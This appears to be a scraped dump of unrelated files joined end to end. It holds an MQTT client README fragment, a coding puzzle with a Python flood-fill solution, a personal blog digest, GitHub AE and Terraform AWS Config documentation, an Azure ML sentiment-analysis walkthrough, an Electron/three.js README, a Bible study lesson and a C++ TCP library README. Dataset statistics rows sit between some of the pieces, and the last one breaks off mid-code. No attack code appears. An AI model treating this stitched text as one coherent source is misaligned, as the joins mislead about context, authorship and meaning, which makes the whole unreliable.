6. **MQTTUseTLS**: If enabled, you can connect to TLS based MQTT brokers. This add some overhead in binary code size (typically 5% more) and requires MbedTLS
The client is located in `Network::Client::MQTTv5` class.
The main methods are:
1. **connectTo**: Establish a connection to the given MQTT server
2. **auth**: Authenticate with the MQTT server
2. **subscribe** (2): Subscribe to one or more topic on the MQTT server
3. **publish**: Publish a packet on a MQTT server
4. **disconnect**: Disconnect from a MQTT server cleanly
5. **eventLoop**: The method that needs to be called regularly (from a thread ?) for processing messages
Upon construction, a buffer for receiving packets (with a limited and specifiable size) is allocated on the heap.
In case your platform does not support heap allocation, this can easily be changed to a BSS/static based allocation in `Network::Client::MQTTv5::Impl` constructor.
# Specificities of MQTT v5.0
MQTT v5.0 introduced new features compared to MQTT v3.1.1: mainly Properties and Authentication
## Authentication
Authentication in MQTT v3.1.1 was mainly either client identifier based or username/password based, a bit like HTTP/1.0 did.
In MQTT v5.0, it's now possible to also have multiple step authentication with per-broker/per-client specific protocol.
Authentication requires a new control packet type, and, as such, you can use **auth** method of the client to build this packet.
The usual process with authentication is the following:
1. Client => `CONNECT with some authentication properties attached` => Server
2. Server => `AUTH with some challenge/method/data` => Client
3. Client => `AUTH with some answer/data`=> Server
4. Server => `CONNACK` => Client
For the first step, you'll need to append as many properties as required (see the Properties section below for how to do that) in your first call to **connectTo**.
When the server answers (in step 2), your callback instance will be called with the authentication method and data already parsed for you.
You'll then use the **auth** method in step 3 to complete the challenge, the method either returns with a success (step 4) or a failure.
Please notice that none of the above is required for usual client identifier or username / password connection.
## Using Properties with the client
Since this library is oriented for embedded usage, a great care was taken for avoiding heap usage and minimizing code size.
### Packet in destination of the broker
In order to acheive theses goals, the `Properties` class is a chained list where each node stores a flag telling if it was allocated on the stack (default) or on the heap.
When the chained list is destructed, each node will either suicide(delete itself) or just chain the destruction request to the next node.
Parsing the chained list is done recursively, but this shouldn't be an issue since the number of possible properties for each packet is small.
Appending properties is done like this:
```
Property<uint32> maxProp(PacketSizeMax, recvBufferSize);
if (!packet.props.getProperty(PacketSizeMax))
    packet.props.append(&maxProp); // That's possible with a stack property as long as the lifetime of the object outlives the packet
```
### Receiving packets from the broker
When receiving a packet, the code never makes any copy, so Properties are deserialized directly from the received buffer.
In that case, you'll be dealing with `PropertiesView` class and more specifically with its `bool getProperty(VisitorVariant & visitor, PropertyType & type, uint32 & offset) const` method.
Typically, you'll create a `VisitorVariant` instance, a `PropertyType` instance and an `offset` counter then call `getProperty`.
This method will fill each instance with the appropriate visitor and type. `offset` is increased to the next property position in the observed (received) buffer.
It's then up to you to check which property you are interested in, and extract the visited property value like this:
```
PropertyType type = BadProperty;
uint32 offset = 0;
VisitorVariant visitor;
while (packet.props.getProperty(visitor, type, offset))
{
switch (type)
{
case PacketSizeMax:
{
auto pod = visitor.as< LittleEndianPODVisitor<uint32> >();
maxPacketSize = pod->getValue();
break;
}
[...]
```
| 54.836735 | 188 | 0.752698 | eng_Latn | 0.998733 |
---
title: Irving McNayr rejects the Governor's
tags:
- Apr 1964
---
Irving McNayr rejects the Governor's Islandia development plan.
Newspapers: **Miami Morning News or The Miami Herald**
Page: **1**, Section: **B**
'''
Description:
Given a 2D board containing 'X' and 'O' (the letter O), capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's into 'X's in that surrounded region.
Example:
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
Explanation:
Surrounded regions shouldn’t be on the border, which means that any 'O' on the border of the board are not flipped to 'X'. Any 'O' that is not on the border and it is not connected to an 'O' on the border will be flipped to 'X'. Two cells are connected if they are adjacent cells connected horizontally or vertically.
'''
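The description above implies the standard flood-fill solution: any 'O' reachable from a border 'O' survives, and every other 'O' flips to 'X'. A minimal Python sketch (not part of the original challenge file; it assumes the board is a list of lists of single characters):

```python
from collections import deque

def solve(board):
    """Flip every 'O' region not connected to the border to 'X', in place."""
    if not board or not board[0]:
        return
    rows, cols = len(board), len(board[0])
    safe = deque()

    # Seed the BFS with every border 'O'; those regions must be kept.
    for r in range(rows):
        for c in range(cols):
            if (r in (0, rows - 1) or c in (0, cols - 1)) and board[r][c] == 'O':
                board[r][c] = 'S'      # temporarily mark as safe
                safe.append((r, c))

    # BFS outward from the border, marking every connected 'O' as safe.
    while safe:
        r, c = safe.popleft()
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < rows and 0 <= nc < cols and board[nr][nc] == 'O':
                board[nr][nc] = 'S'
                safe.append((nr, nc))

    # Unreached 'O's are surrounded and flip; safe cells are restored.
    for r in range(rows):
        for c in range(cols):
            if board[r][c] == 'O':
                board[r][c] = 'X'
            elif board[r][c] == 'S':
                board[r][c] = 'O'

board = [list("XXXX"),
         list("XOOX"),
         list("XXOX"),
         list("XOXX")]
solve(board)
print(["".join(row) for row in board])  # ['XXXX', 'XXXX', 'XXXX', 'XOXX']
```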
---
layout: post
title: 2019/10/07 weekly digest
---
As usual, I did not go out to squeeze into the crowds this National Day holiday; I stayed home to rest and study. In short, the haul was a few books and a few videos — a quick recap below.
## Reading notes
### 1. Alpha Brain
This book was recommended by Zhang Lei. It is mainly about applying cognitive science to investing and business — essentially an operating manual for the brain. I have read about a third of it so far. Many of the concepts were familiar from before, for example from Munger's writing and the famous *Thinking, Fast and Slow*, but under the author's organization they feel very practical, probably owing to his background as a hedge fund investment manager. My notes so far:
* **In competitions and games, reducing mistakes is the key to a high win rate; tiny marginal improvements can produce enormous changes.** The author uses a tennis player as an example (many books like tennis examples, since tennis is an extremely data-driven sport with per-match statistics for every player): across the stages of his career, from journeyman to world-class player, his return success rate (roughly) rose only from 49% to 53%, yet that produced enormous changes in his match win rate and financial rewards.
* In markets, your wins or returns come from two parts: luck and skill. Skill means seizing other players' mistakes and turning them into your own edge. If every player made no mistakes, it would become a pure game of luck. This is a bit like GTO play in Texas hold'em: if everyone at the table played the optimal strategy, so-called skill and strategy would produce no extra profit (from bluffs or value bets) — an equilibrium. In investing, the point is that the market is not always efficient; it produces mispricings, and capable investors can extract excess returns from them — the so-called alpha.
* On decision-making there are two research directions: how decisions *should* be made (how to make a rational decision), and how we *actually* make them (what kinds of errors humans commit). The author proposes a third approach, helping decision makers close the gap between theory and practice (reducing mistakes).
* The brain has a tendency to reach for mental shortcuts first instead of letting the rational part process stimuli directly, generally passing through the stages autopilot → cognitive ease → stress → cognitive strain. We therefore need to train our capacity for rational decisions (Kahneman's "System 2").
* On how to make decisions rationally, the most important step is the first: defining the problem. The second is analyzing the current situation; after that, the possible actions present themselves naturally.
## Interesting videos
### 1. Dan Lok's YouTube videos
I found out about this guy from an article by Wang Chuan (WeChat account: investguru) and went to study his material. Dan is a Chinese-Canadian who never attended university; he started out as a copywriter and built businesses from there. His main theory is called high-ticket sales: do high-margin business, with a whole sales system derived from that idea. A few points are quite interesting and worth sharing with the team later.
* Customers fall into four types: *cheap* — they only look at the price, no matter what you sell; *difficult* — hard to deal with, seemingly there just to make you unhappy; *sophisticated* — knowledgeable customers who need professional service; and *affluent* — well-off customers who buy when it feels right. Salespeople should focus their energy on the last two types.
* He has hundreds of YouTube videos about sales, making money, and motivation. Many of the techniques genuinely have value, and the videos also show he is an excellent speaker and marketer. That said, this is not a mindset for building a big business — it is more a playbook for a few people to make a good amount of money (not that there is anything wrong with that; he himself says he prefers small business).
### 2. Documentaries
#### 2.1 Zhou Hao's *Cop Shop* (差馆)
Available on Bilibili, it documents the assorted cases that passed through the Guangzhou railway station around Spring Festival in about 2011. Zhou Hao's films are all striking (his *The Chinese Mayor* and *Shu Ji* record the stories of two government officials). Watching this film, the most reasonable person in it turned out to be someone just released from prison — genuinely sobering.
**This is a China torn in two**: 300 million people with developed-country incomes plus 1.1 billion people in a low-income developing country. Seventy years of development have produced a huge economic miracle, but it is still far from enough; I hope that by the 100th anniversary we will see far more change.
P.S. This gave me a new appreciation of Pinduoduo's value — should I go buy a little?
#### 2.2 Inside Bill's Brain
A Netflix production — guaranteed quality.
Three short episodes in all, edited as a montage (a bit headache-inducing to watch) that interweaves Gates's upbringing, the building of Microsoft, and the foundation's work since its creation. From it you get a sense of how Gates thinks and works.
* He deeply loves thinking and reading, carrying a bag of books everywhere. Since the 1990s he has kept something like a think-and-read week: a week alone at a retreat to read, think, and write (which is pretty much how my holidays go, ha). Of course a genius brain really is formidable — his reading speed and quality far exceed an ordinary person's.
* In Go terms, Gates is a shobushi — a contest player who cares intensely about results. At the same time, he enjoys the process of the challenge.
* The portrayal of Gates's relationships with Melinda, his mother, Paul Allen, and Kent is very real. Gates, an extremely rational person, does not neglect his own feelings — and he can balance them with reason, which I envy.
* One scene left a deep impression: the director asks roughly what meaning there is in the foundation doing all this, and Gates answers "Optimization" — putting the world's resources to effective use. As a rational optimizer myself, I found that very moving; it is the state I have always pursued.
Finally, as everyone knows, he and Buffett are close, so this film pairs well with the Buffett documentary — even better consumed together.
## West Lake
At the end of the holiday I took a night stroll around West Lake; unexpectedly, it was still full of visitors.
I do not know why, but just a short while by the lake restores so much of my mood and energy. I have decided to make this a regular routine — a walk after work in the evening.
That really is the charm of Hangzhou: "Unable to tear myself away from Hangzhou — half of what detains me is this lake" (Bai Juyi).
---
title: Adding AE hosted runners
intro: 'You can add {% data variables.actions.hosted_runner %} to an organization or enterprise.'
versions:
  github-ae: '*'
---
{% data reusables.actions.ae-beta %}
{% note %}
**Note:** To add {% data variables.actions.hosted_runner %} to {% data variables.product.prodname_ghe_managed %}, you need to contact {% data variables.product.prodname_dotcom %} support. This article describes the information that support needs to complete this process.
{% endnote %}
{% data variables.actions.hosted_runner %} can use base Azure OS images, or you can create your own custom images.
### Adding a {% data variables.actions.hosted_runner %} from a base Azure image
You can add {% data variables.actions.hosted_runner %} that use base Azure OS images. To add a {% data variables.actions.hosted_runner %} to your organization or enterprise, contact {% data variables.product.prodname_dotcom %} support with the following information ready:
- The required operating system: for the available options, see "[Software specifications](/actions/using-github-hosted-runners/about-ae-hosted-runners#software-specifications)."
- A name for each {% data variables.actions.hosted_runner %} pool. These names are created as labels that let you route workflows to these runners. For more information, see "[Using AE hosted runners in a workflow](/actions/using-github-hosted-runners/using-ae-hosted-runners-in-a-workflow)."
- Where to add the {% data variables.actions.hosted_runner %}: determine the names of the organizations and enterprises that will receive the runner.
### Adding a {% data variables.actions.hosted_runner %} with a custom image
To create a custom OS image, see the steps in "[Creating custom images](/actions/using-github-hosted-runners/creating-custom-images)."
After creating a custom image with the steps above, contact {% data variables.product.prodname_dotcom %} support and provide the following details:
- The SAS URI generated when following the custom image creation steps.
- The type of OS the image uses: this can be Linux or Windows.
- The image name.
- The version.
- The VM SKU for the new pool.
- A name for each {% data variables.actions.hosted_runner %} pool. These names are created as labels that let you route workflows to these runners. For more information, see "[Using AE hosted runners in a workflow](/actions/using-github-hosted-runners/using-ae-hosted-runners-in-a-workflow)."
- Where to add the {% data variables.actions.hosted_runner %}: determine the names of the organizations and enterprises that will receive the runner.
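Once a pool exists, its name can be used as a label in a workflow's `runs-on` key; a minimal sketch (the pool name `my-ae-pool` is hypothetical — use whatever name support created for you):

```yaml
name: CI
on: push
jobs:
  build:
    # Route this job to the AE hosted runner pool created by support.
    runs-on: my-ae-pool
    steps:
      - uses: actions/checkout@v2
      - run: echo "Running on an AE hosted runner"
```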
### Viewing your {% data variables.actions.hosted_runner %}
After {% data variables.product.prodname_dotcom %} support adds your runners, you can find them in your list of runners:
{% data reusables.github-actions.hosted-runner-navigate-to-repo-org-enterprise %}
{% data reusables.github-actions.hosted-runner-list %}
| 44.888889 | 228 | 0.755941 | yue_Hant | 0.414207 |
---
subcategory: "Config"
layout: "aws"
page_title: "AWS: aws_config_remediation_configuration"
description: |-
Provides an AWS Config Remediation Configuration.
---
# Resource: aws_config_remediation_configuration
Provides an AWS Config Remediation Configuration.
~> **Note:** Config Remediation Configuration requires an existing [Config Rule](/docs/providers/aws/r/config_config_rule.html) to be present.
## Example Usage
AWS managed rules can be used by setting the source owner to `AWS` and the source identifier to the name of the managed rule. More information about AWS managed rules can be found in the [AWS Config Developer Guide](https://docs.aws.amazon.com/config/latest/developerguide/evaluate-config_use-managed-rules.html).
```hcl
resource "aws_config_config_rule" "this" {
name = "example"
source {
owner = "AWS"
source_identifier = "S3_BUCKET_VERSIONING_ENABLED"
}
}
resource "aws_config_remediation_configuration" "this" {
config_rule_name = aws_config_config_rule.this.name
resource_type = "AWS::S3::Bucket"
target_type = "SSM_DOCUMENT"
target_id = "AWS-EnableS3BucketEncryption"
target_version = "1"
parameter {
name = "AutomationAssumeRole"
static_value = "arn:aws:iam::875924563244:role/security_config"
}
parameter {
name = "BucketName"
resource_value = "RESOURCE_ID"
}
parameter {
name = "SSEAlgorithm"
static_value = "AES256"
}
}
```
## Argument Reference
The following arguments are supported:
* `config_rule_name` - (Required) The name of the AWS Config rule
* `resource_type` - (Optional) The type of a resource
* `target_id` - (Required) Target ID is the name of the public document
* `target_type` - (Required) The type of the target. Target executes remediation. For example, SSM document
* `target_version` - (Optional) Version of the target. For example, version of the SSM document
* `parameter` - (Optional) Can be specified multiple times for each
parameter. Each parameter block supports fields documented below.
The `parameter` block supports:
The value is either a dynamic (resource) value or a static value.
You must select either a dynamic value or a static value.
* `name` - (Required) The name of the attribute.
* `resource_value` - (Optional) The value is dynamic and changes at run-time.
* `static_value` - (Optional) The value is static and does not change at run-time.
## Import
Remediation Configurations can be imported using the name config_rule_name, e.g.
```
$ terraform import aws_config_remediation_configuration.this example
```
| 33.189873 | 313 | 0.736842 | eng_Latn | 0.911937 |
---
title: Classificazione del sentiment di Twitter con il pacchetto di Azure Machine Learning (AML) per l'analisi del testo (AMLPTA) e il processo di data science per i team (TDSP) | Microsoft Docs
description: Viene descritto l'uso del processo di data science per i team (TDSP) e del pacchetto di Azure Machine Learning (AML) per l'analisi del testo (AMLPTA) per la classificazione del sentiment
services: machine-learning, team-data-science-process
documentationcenter: ''
author: deguhath
manager: deguhath
editor: cgronlun
ms.assetid: b8fbef77-3e80-4911-8e84-23dbf42c9bee
ms.service: machine-learning
ms.workload: data-services
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: article
ms.date: 06/20/2018
ms.author: deguhath
ms.openlocfilehash: 9e5018bc4c7b90897f7f8c91169410284217b172
ms.sourcegitcommit: e2ea404126bdd990570b4417794d63367a417856
ms.translationtype: HT
ms.contentlocale: it-IT
ms.lasthandoff: 09/14/2018
ms.locfileid: "45577008"
---
# <a name="twitter-sentiment-classification-with-azure-machine-learning-aml-package-for-text-analytics-amlpta-and-team-data-science-process-tdsp"></a>Twitter sentiment classification with the Azure Machine Learning (AML) Package for Text Analytics (AMLPTA) and the Team Data Science Process (TDSP)
## <a name="introduction"></a>Introduction
Standardizing the structure and documentation of data science projects, tied to an established [data science lifecycle](https://github.com/Azure/Microsoft-TDSP/blob/master/Docs/lifecycle-detail.md), is key to fostering effective collaboration in data science teams.
A [GitHub repository with the TDSP project structure and templates](https://github.com/Azure/Azure-TDSP-ProjectTemplate) was released previously. Now it is possible to create Azure Machine Learning projects that are instantiated with the [TDSP structure and documentation templates for Azure Machine Learning](https://github.com/amlsamples/tdsp). Instructions on how to use the TDSP structure and templates in Azure Machine Learning are available [here](https://docs.microsoft.com/azure/machine-learning/preview/how-to-use-tdsp-in-azure-ml).
This example shows how to use the Azure Machine Learning Package for Text Analytics and the Team Data Science Process to develop and deploy predictive models for Twitter sentiment classification.
## <a name="use-case"></a>Use case
### <a name="twitter-sentiment-polarity-sample"></a>Twitter sentiment polarity sample
This article uses a sample to show how to instantiate and execute a machine learning project. The sample uses the TDSP structure and templates in Azure Machine Learning Workbench; the complete sample is available in this walkthrough. The modeling task predicts sentiment polarity (positive or negative) from the text of tweets. This article covers the data modeling tasks described in the walkthrough, which include the following:
1. Data exploration, training, and deployment of a machine learning model that addresses the prediction problem described in the use case overview. Twitter sentiment data is used for these tasks.
2. Execution of the project through the TDSP template from Azure Machine Learning for this project. The TDSP lifecycle is used for project execution and reporting.
3. Operationalization of the solution directly from Azure Machine Learning to Azure Container Service.
The project highlights the use of the Azure Machine Learning Package for Text Analytics.
## <a name="link-to-github-repository"></a>Link to GitHub repository
The link to the GitHub repository is available [here](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction).
### <a name="purpose"></a>Purpose
The main purpose of this sample is to show how to instantiate and execute a machine learning project using the Team Data Science Process (TDSP) structure and templates in Azure Machine Learning Workbench. For this purpose, [Twitter sentiment data](http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip) is used. The modeling task is to predict sentiment polarity (positive or negative) using the text of tweets.
### <a name="scope"></a>Scope
- Data exploration, training, and deployment of a machine learning model that addresses the prediction problem described in the use case overview.
- Execution of the project in Azure Machine Learning using the Team Data Science Process (TDSP) template for this project. The TDSP lifecycle is used for project execution and reporting.
- Operationalization of the solution directly from Azure Machine Learning to Azure Container Services.
The project highlights several features of Azure Machine Learning, including instantiation and use of the Team Data Science Process (TDSP) structure, code execution in Azure Machine Learning Workbench, and easy operationalization in Azure Container Services with Docker and Kubernetes.
## <a name="team-data-science-process-tds"></a>Team Data Science Process (TDSP)
The Team Data Science Process (TDSP) project structure and documentation templates are used to execute this sample, following the [Team Data Science Process lifecycle](https://docs.microsoft.com/azure/machine-learning/team-data-science-process/lifecycle). The project is created based on the instructions provided [here](https://github.com/amlsamples/tdsp/blob/master/docs/how-to-use-tdsp-in-azure-ml.md).
<img src="./media/predict-twitter-sentiment-amltextpackage/tdsp-lifecycle2.png" alt="tdsp-lifecycle" width="800" height="600">
## <a name="use-case-overview"></a>Use case overview
The task is to predict the binary sentiment polarity of each tweet using distributed word representation features extracted from the Twitter text. For details, see this [repository](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction).
### <a name="data-acquisition-and-understandinghttpsgithubcomazuremachinelearningsamples-amltextpackage-twittersentimentpredictiontreemastercode01dataacquisitionandunderstanding"></a>[Data acquisition and understanding](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction/tree/master/code/01_data_acquisition_and_understanding)
The first step of this sample is to download the sentiment140 dataset and split it into training and test datasets. The sentiment140 dataset contains the actual tweet content (with emoticons removed) along with the polarity of each tweet (negative = 0, positive = 4), with neutral tweets removed. The resulting training data contains 1.3 million rows, and the test data contains 320,000 rows.
### <a name="modelinghttpsgithubcomazuremachinelearningsamples-amltextpackage-twittersentimentpredictiontreemastercode02modeling"></a>[Modeling](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction/tree/master/code/02_modeling)
This part of the sample is further divided into three subparts:
- **Feature engineering**: covers the generation of features using the Word2Vec distributed word representation algorithm.
- **Model creation**: covers training several models, such as _logistic regression_ and _gradient boosting_, to predict the sentiment of the input text.
- **Model evaluation**: applies the trained model to the test data.
#### <a name="feature-engineering"></a>Feature engineering
<b>Word2Vec</b> is used to generate distributed word representations. First, the Word2Vec algorithm is used in skip-gram mode, as described in [Mikolov, Tomas, et al. Distributed representations of words and phrases and their compositionality. Advances in neural information processing systems. 2013.](https://arxiv.org/abs/1310.4546), to generate distributed representations of the words.
Skip-gram is a shallow neural network that takes the target word, encoded as a one-hot vector, as input and uses it to predict nearby words. If V is the size of the vocabulary, the size of the output layer would be __C*V__, where C is the size of the context window. The skip-gram-based architecture is shown in the following figure.
<table class="image" align="center">
<caption align="bottom">Skip-gram model</caption>
<tr><td><img src="https://s3-ap-south-1.amazonaws.com/av-blog-media/wp-content/uploads/2017/06/05000515/Capture2-276x300.png" alt="Skip-gram model"/></td></tr>
</table>
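To make the skip-gram setup concrete, here is a minimal, dependency-free sketch (in Python) of how (target, context) training pairs and one-hot inputs are built from tweet tokens for a context window of size C. This is illustrative only: the sample itself trains Word2Vec in TensorFlow (02_A_Word2Vec.py), and the function names below are invented for the sketch.

```python
def skipgram_pairs(tokens, window=2):
    """Generate (target, context) training pairs for skip-gram.

    For each target word, every word within `window` positions on
    either side is a context word the model learns to predict.
    """
    pairs = []
    for i, target in enumerate(tokens):
        lo = max(0, i - window)
        hi = min(len(tokens), i + window + 1)
        for j in range(lo, hi):
            if j != i:  # skip the target word itself
                pairs.append((target, tokens[j]))
    return pairs


def one_hot(word, vocab):
    """Encode a word as a one-hot vector over vocabulary `vocab` (size V)."""
    return [1 if w == word else 0 for w in vocab]


tweet = "i love this new phone".split()
pairs = skipgram_pairs(tweet, window=2)
print(pairs[:4])
# [('i', 'love'), ('i', 'this'), ('love', 'i'), ('love', 'this')]
```

Each pair then becomes one training example: the one-hot target is the network input, and the context word is the label the output layer must predict.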
The details of the Word2Vec algorithm and the skip-gram model are beyond the scope of this sample; interested readers can consult the following links for more details. The code in 02_A_Word2Vec.py references the [TensorFlow examples](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/tutorials/word2vec/word2vec_basic.py).
* [Vector Representations of Words](https://www.tensorflow.org/tutorials/word2vec)
* [How exactly does word2vec work?](http://www.1-4-5.net/~dmm/ml/how_does_word2vec_work.pdf)
* [Notes on Noise Contrastive Estimation and Negative Sampling](http://demo.clab.cs.cmu.edu/cdyer/nce_notes.pdf)
At the end of the training process, two distributed-representation files in TSV format are generated for the modeling stage.
#### <a name="model-training"></a>Model training
After the word vectors are generated with the Word2Vec or SSWE algorithm, the next step is to train classification models to predict the actual sentiment polarity. The two feature types, Word2Vec and SSWE, are fed into two models: logistic regression and convolutional neural networks (CNNs).
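One simple way to turn per-word vectors (Word2Vec or SSWE) into a fixed-length feature vector for a classifier such as logistic regression is to average the vectors of the words in each tweet. The snippet below is a dependency-free sketch with invented toy embedding values; the actual sample uses the vectors produced in the previous step.

```python
def tweet_features(tokens, embeddings, dim):
    """Average the embedding vectors of the known words in a tweet.

    Words missing from `embeddings` are skipped; an all-zero vector
    is returned if no word in the tweet is known.
    """
    known = [embeddings[w] for w in tokens if w in embeddings]
    if not known:
        return [0.0] * dim
    return [sum(vals) / len(known) for vals in zip(*known)]


# Toy 3-dimensional embeddings (values invented for illustration).
emb = {
    "good": [0.9, 0.1, 0.0],
    "bad": [-0.8, 0.2, 0.1],
    "phone": [0.0, 0.5, 0.5],
}

print(tweet_features(["good", "phone"], emb, dim=3))
# roughly [0.45, 0.3, 0.25], up to floating-point rounding
```

The resulting fixed-length vectors can be fed directly to any standard classifier.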
#### <a name="model-evaluation"></a>Model evaluation
Code is provided to load and evaluate multiple trained models on a test dataset.
### <a name="deploymenthttpsgithubcomazuremachinelearningsamples-amltextpackage-twittersentimentpredictiontreemastercode03deployment"></a>[Deployment](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction/tree/master/code/03_deployment)
This part provides links to instructions for operationalizing a pre-trained sentiment prediction model as a web service on a cluster in Azure Container Service (AKS). The operationalization environment provisions Docker and Kubernetes on the cluster to manage the web service deployment. More information about the operationalization process is available [here](https://docs.microsoft.com/azure/machine-learning/preview/model-management-service-deploy).
## <a name="conclusion"></a>Conclusion
This sample walked through how to train a distributed word representation model using the Word2Vec algorithm and then use the extracted embeddings as features to train two different models to predict the sentiment score of Twitter text data. One of these models is deployed to Azure Container Service (AKS).
## <a name="next-steps"></a>Next steps
To get started, read more documentation on the [Azure Machine Learning Package for Text Analytics (AMLPTA)](https://docs.microsoft.com/python/api/overview/azure-machine-learning/textanalytics?view=azure-ml-py-latest) and the [Team Data Science Process (TDSP)](https://aka.ms/tdsp).
## <a name="references"></a>References
* [Team Data Science Process](https://docs.microsoft.com/azure/machine-learning/team-data-science-process/overview)
* [How to use Team Data Science Process (TDSP) in Azure Machine Learning](https://aka.ms/how-to-use-tdsp-in-aml)
* [TDSP project template for Azure Machine Learning](https://aka.ms/tdspamlgithubrepo)
* [Azure ML Workbench](https://docs.microsoft.com/azure/machine-learning/preview/)
* [Mikolov, Tomas, et al. Distributed representations of words and phrases and their compositionality. Advances in neural information processing systems. 2013.](https://arxiv.org/abs/1310.4546)

---

**Source:** `README.md` from `vorth/electron-threejs-with-create-react-app` (MIT license)

# React, Three.js, and Electron
This is a fork of [electron-with-create-react-app](https://github.com/csepulv/electron-with-create-react-app). In this fork, I am integrating three.js in the form of [react-three-renderer-example](https://github.com/toxicFork/react-three-renderer-example).
I have removed some of the examples from the original `react-three-renderer-example`, to simplify things a bit.
To run the application:

    npm install
    npm start
## Provenance
This [post on freeCodeCamp](https://medium.freecodecamp.com/building-an-electron-application-with-create-react-app-97945861647c#.ze6c9qin1) illustrates building an [Electron](https://electron.atom.io/) application with [React](https://facebook.github.io/react/), taking advantage of `create-react-app`. I have merged some of the branches from the repo for that project.
The other major input was [react-three-renderer-example](https://github.com/toxicFork/react-three-renderer-example), which illustrates a very nice integration of [three.js](https://threejs.org/), the popular WebGL library, with [React](https://facebook.github.io/react/).

---

**Source:** `src/en/2020-04-cq/05/01.md` from `PrJared/sabbath-school-lessons` (MIT license)

---
title: To Love More Than Self
date: 24/10/2020
---
#### inTro
Read This Week’s Passage: Luke 10:25–37
**To Love More Than Self**
The foundation of creation was love. Unlike the creator in other creation narratives from ancient texts, the God of the Bible did not create the world so He could be served; He created it because He is love. His love can be seen in every aspect of the creation story, but it is perhaps most powerfully expressed in the manner in which He created Adam and Eve and the purpose He instilled in them to achieve. Love is also the foundation of redemption. “God so loved the world, that He gave His only begotten Son, that whoever believes in Him should not perish but have everlasting life” (John 3:16). The story of redemption teaches us that God loved us more than He loved Himself.
Since love is the basis of creation and redemption, it is also the basis of real education. To love God with heart, mind, soul, and strength means that in the whole being, every aspect of development is to reach its highest attainment in unselfish love for God.
“Like the first is the second commandment, ‘Thou shalt love thy neighbor as thyself.’ Mark 12:31. The law of love calls for the devotion of body, mind, and soul to the service of God and humanity. This service, while making us a blessing to others, brings the greatest blessing to ourselves. Unselfishness underlies all true development. Through unselfish service we receive the highest culture of every faculty. More and more fully do we become partakers of the divine nature. We are fitted for heaven, for we receive heaven into our hearts” (Education, 16).
#### inScribe
Write out Luke 10:25–37 from the translation of your choice. You may also rewrite the passage in your own words, outline, or mind map the chapter.

---

**Source:** `README.md` from `WineChord/chtho` (MIT license)

# chtho
A TCP network library implemented in C++11.
## Quick Start
* Clone the code and build:
```
$ git clone https://github.com/WineChord/chtho.git
$ cd chtho
$ make
```
* Run the simple echo server and client examples:
```
$ ./build/bin/echoserver_test 5 # thread pool size (i.e. # of sub Reactors)
$ # inside another terminal
$ ./build/bin/echoclient_test 127.0.0.1 3 # server ip and number of clients
$ # then the message of 'hello' and 'world' will bump between
$ # client and server infinitely
```
## Modules
* time
* `Timestamp`: Provide basic utilities to provide current time and its conversions.
* `TimeZone`: Convert from Coordinated Universal Time to local time.
* logging
* `Logger` and `LogStream`: front end of the logging system, used directly by the user.
* `AsyncLogging`, `LogFile` and `FileUtil`: back end of the logging system, asynchronously flush the data to disk and conditionally roll the log.
* threading
* `MutexLock`, `MutexLockGuard`, `Condition` and `CountDownLatch`: encapsulated synchronization utilities.
* `Thread` and `ThreadPool`: thread utilities based on pthread
* timers
* `Timer` and `TimerID`: record timestamp and callback function.
* `TimerQueue`: add/remove timers and find expired timers using balanced binary tree.
* networking
* `Channel`: important abstraction provided for file descriptors and its relating events and corresponding callback functions.
* `EventLoop`: core class that demonstrates the Reactor pattern.
* `EventLoopThread`: encapsulates the eventloop in a thread, ensuring 'one loop per thread'.
* `EventLoopThreadPool`: starts a main eventloop thread acting as the main Reactor (usually used to monitor the listening socket) and a bunch of other eventloop
thread acting as the sub Reactors (usually used to monitor read/write events happened on the connecting sockets).
* poller
  * `Poller`: base class providing the polling interface; uses `Channel` to manage the events and callback functions of file descriptors.
  * `Poll`: an implementation of `Poller` using `poll(2)`.
  * `EPoll`: an implementation of `Poller` using `epoll(2)`, level-triggered.
* `Buffer`: used by `TcpConnection` to allow partial read/write.
* `TcpConnection`: manages read/write/close/error events happened on the connecting file descriptors, uses `Buffer` to read/write data.
* `Acceptor`: created in `TcpServer`, encapsulates the `socket`, `bind`, `listen` and `accept` steps. Inside `Acceptor::listen`, it passes the connection socket file descriptor returned by `accept` to the new-connection callback function provided by `TcpServer`. `TcpServer` finds a thread from the thread pool for this new connection fd and creates a `TcpConnection` object. `TcpConnection` registers the connection channel (created upon the connection fd) with the poller inside the eventloop that was dispatched earlier inside `TcpServer`, and then starts to handle events happening on the connection channel (through the callback functions registered on the channel).
* `TcpServer`: encapsulates a `EventLoopThreadPool` and `Acceptor`. `Acceptor` will handle `socket`, `bind`, `listen` and `accept` steps. `TcpServer`'s main role is dispatch the new connections to threads inside eventloop thread pool. It also provides the connection callback and message callback interface to the user.
* `Connector`: works for `TcpClient`, encapsulates the `socket` and `connect` steps. Depending on the return value of `::connect`, it uses a channel to detect whether the connection socket is available for writing. If it is, the channel for the socket is removed and the socket file descriptor is passed to the new-connection callback function provided by `TcpClient`. `TcpClient` uses the socket file descriptor to create a new `TcpConnection`. The `TcpConnection` then handles the read/write events on the connection file descriptor. (The whole process is quite similar to `Acceptor`.)
* `TcpClient`: encapsulates an `EventLoop` and a `Connector`. Similar to `TcpServer`, it creates a new `TcpConnection` using the file descriptor provided by the `Connector`. It also provides the connection callback and message callback interface to the user.
* `InetAddr`: encapsulates Internet address.
* `Socket`: encapsulates socket related information.
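As a language-agnostic illustration of the `Channel`/`Poller`/`EventLoop` trio (the classic Reactor pattern), here is one iteration of an event loop sketched in Python with the standard-library `selectors` module; chtho itself is C++, and the names below are invented for the sketch.

```python
import selectors
import socket

received = []


def on_readable(conn):
    """Callback attached to a 'channel' (an fd plus its read handler)."""
    received.append(conn.recv(1024))


sel = selectors.DefaultSelector()

# A connected socket pair stands in for an accepted client connection.
server_side, client_side = socket.socketpair()
sel.register(server_side, selectors.EVENT_READ, on_readable)

client_side.send(b"hello")

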